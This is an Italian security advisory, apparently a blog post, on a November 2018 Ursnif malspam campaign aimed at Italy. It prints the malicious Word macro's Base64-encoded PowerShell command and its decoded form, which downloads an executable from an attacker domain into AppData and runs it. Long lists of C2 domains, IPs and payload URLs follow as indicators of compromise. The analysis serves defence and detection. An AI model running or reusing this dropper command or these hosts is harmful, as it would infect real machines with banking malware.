Campagna malspam Ursnif mirata all'Italia - IoC (26 novembre 2018)

Campagna malspam Ursnif mirata all'Italia - IoC (26 novembre 2018)

Recentemente è stata individuata una campagna malspam veicolante la minaccia Ursnif. Di seguito una panoramica e gli indicatori emersi dalle analisi.

La campagna sembrerebbe essere rivolta esclusivamente ad un pubblico italiano, perciò siamo tutti potenziali target.

Un documento campione si presenterebbe così:

Il payload contenuto in questi documenti sarebbe offuscato sfruttando una componente della versione Word 2007 o successive, ossia una specificare una descrizione alternativa dell'oggetto che si può vedere nello screenshot, ossia l'immagine con il logo di Word.

La descrizione è ottenibile dalla seguente schermata:

Il codice eseguito dalla macro è il seguente:

Shell(“cMd.EXE /c poWerShelL.exe -ec KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwBzAGMAbwBwAG8AZQBpAGQAaQBkAC4AYwBvAG0ALwBZAEUAUgAvAHAAZQBsAGkAbQAuAHAAaABwAD8AbAA9AHkAdQBuAG8AMQAuAHcAbwBzACIALAAgACQAZQBuAHYAOgBBAFAAUABEAEEAVABBACAAKwAgACcAXABmADUAMABhAGYANgA4AGYALgBlAHgAZQAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAJwBcAGYANQAwAGEAZgA2ADgAZgAuAGUAeABlACcAOwAgAEUAeABpAHQA”,0)

Il comando è codificato in Base64.
Se esso si decifra in ASCII, si ottiene il seguente output:

cMd.EXE /c poWerShelL.exe -e (New-Object System.Net.WebClient).DownloadFile (“http://scopoeidid.com/YER/pelim.php?l=yuno1.wos”, $env:APPDATA + ‘\f50af68f.exe’);Start-Process $env:APPDATA’\f50af68f.exe’; Exit

Come si può notare dal comando, il malware scarica il payload dall’URL scopoeidid.com/YER/pelim.php?l=yuno1.wos, quindi salva ed esegue il file eseguibile denominato f50af68f.exe, salvato nella directory C:\Users\[utente]\AppData.

Gli IoC (relativi i C2 rilevati)

Domini Web:

5.greenstarenergy-usa.info
a.greenstarenergy-usa.com
addr.geoffday.org
analizereereeser.top
azzereboshit.org
barquadrocore.com
bdi2.nomadicdecorator.com
brafards.com
cheresto.com
chirulid.com
cjwefomatt.com
cythromatt.com
democracysupport23571.com
democracysupport4273.com
djecalciar.com
dubbergergbb.com
dynonortheast.com
expoartshop.com
fontrate.com
g.greenstarenergy-usa.net
gh0styns.com
go.jackanorypr.com
gtkenforcers.com
h1n1m1t1n1ik.com
hutedredea.com
jerrufer.com
klardiro.com
kraspirt.com
kratique.com
kyllborena.com
labarnor.com
lacruissanter.com
lapaneti.com
lastsmartbull.win
leswestr.com
lilawaspy.com
lindomodkan.com
lugtimbo.net
manahars.com
manistor.com
masterquester.com
megabitcraft.com
megaupstellat.top
mezendracr.com
mnesenesse.com
myfurer.org
neobindcraft.com
neonbindcraft.win
neonbindcrafter.top
ninasukash.com
nosenessel.com
novo-dime.com
openyourdoorbiz.com
ostrolista.com
ourstried.com
pallituk.com
parked.dynonortheast.com
parking.dynophyl.com
pilewitene.com
podylostol.com
pramball.com
prodropgrand.com
promanagerer.com
ptyptossen.com
pygicketem.com
ranacered.com
reballer.com
refartor.com
revellistique.com
roidlandev.com
sautecauda.com
sauveg.top
scopoledod.com
shumbildac.com
smallbusterd.com
sph.expoartshop.com
stats.allthevapes.com
suggenesse.com
technoelectrorealm.org
ticrerfgiff.com
tifyiskeri.com
trastres.com
trkalfacashier.pw
trktrack.pw
twispaglop.com
unitedsexypeople.com
uvurinestl.com
vitesssedown.com
vrotkompot.com
wassedfast.com
wifilhonle.com
wildlucker.com
xmp.kilttrip.net
yomudpipra.com
youtubegifer.com
zumzisearch.com

IP:

109.230.199.169
109.234.35.3
176.119.1.175
185.158.248.24
185.159.128.78
185.180.198.222
185.180.198.228
185.180.198.229
185.180.198.230
185.251.38.208
192.162.244.12
192.162.244.169
192.162.244.171
204.79.197.200
217.147.170.91
217.147.170.94
46.17.46.173
46.17.47.4
46.17.47.99
46.29.160.132
46.29.161.213
62.149.140.59
92.242.63.202
93.184.220.29
94.103.81.168
94.103.82.216
95.181.198.115
95.181.198.116
95.181.198.72

URL:

http://scopoeidid.com/YER/pelim.php?l=yuno1.wos
http://abbtggmaazzrt.com/favicon.ico
http://abbtggmaazzrt.com/images/AO46Ib29/wlAul5rWWXhiOqr6gTX3nQL/GRjeFE1cVw/nAhKsuVLljPAep80s/Y3kgq_
http://abbtggmaazzrt.com/images/AO46Ib29/wlAul5rWWXhiOqr6gTX3nQL/GRjeFE1cVw/nAhKsuVLljPAep80s/Y3kgq_2BeJsL/CFbeeX1o3om/FckI2BkKn07qSc/O2I5lXF4ANvw89oB3_2Fe/bQBPjF_2BSl2UhnW/_2B3GVSTKSX5gIM/CxooB0doo/U9.avi
http://abbtggmaazzrt.com/images/gtA8_2FSZbJaRrUOoGK58/clLnR4L8vdeEpv3J/xr6_2Fedyx2ro8R/ALhgGMTTAYSKj
http://abbtggmaazzrt.com/favicon.ico~
http://abbtggmaazzrt.com/images/gtA8_2FSZbJaRrUOoGK58/clLnR4L8vdeEpv3J/xr6_2Fedyx2ro8R/ALhgGMTTAYSKjRKMoT/l0vBKi952/DGK_2FYjG_2BBdxTQR_2/B1dJwhnG_2B8JkGZWzL/386momS1gbk0mGG0VbOfEQ/_2FbExGljSjG2/OM_2BoBeMX/fos.avi
http://ninasukash.com/YER/pelim.php
http://cjwefomatt.com/images/
http://46.17.47.99/
http://46.29.161.214/uquqwehjsbdqwe.rar
http://gogicinbre.com/LYW/quines.php?l=eruc1.bod
http://objecopoly.com/images/R_2BxOwijiSxirKCti/nVgBEAtU2/AJ2elRMAeHQwbva7N3PL/YWYvDvtJgfGwIq0pcR7/_2BEFIuWKndV9D_2F6QNkA/UK2HvDr22InA9/_2BTVBwk/MgpuTLLISr_2BllmYgrVg4O/52LFS_2Fey/2_2BI_2FNvbZvPwCF/6hs64jc.avi
Mostra i Commenti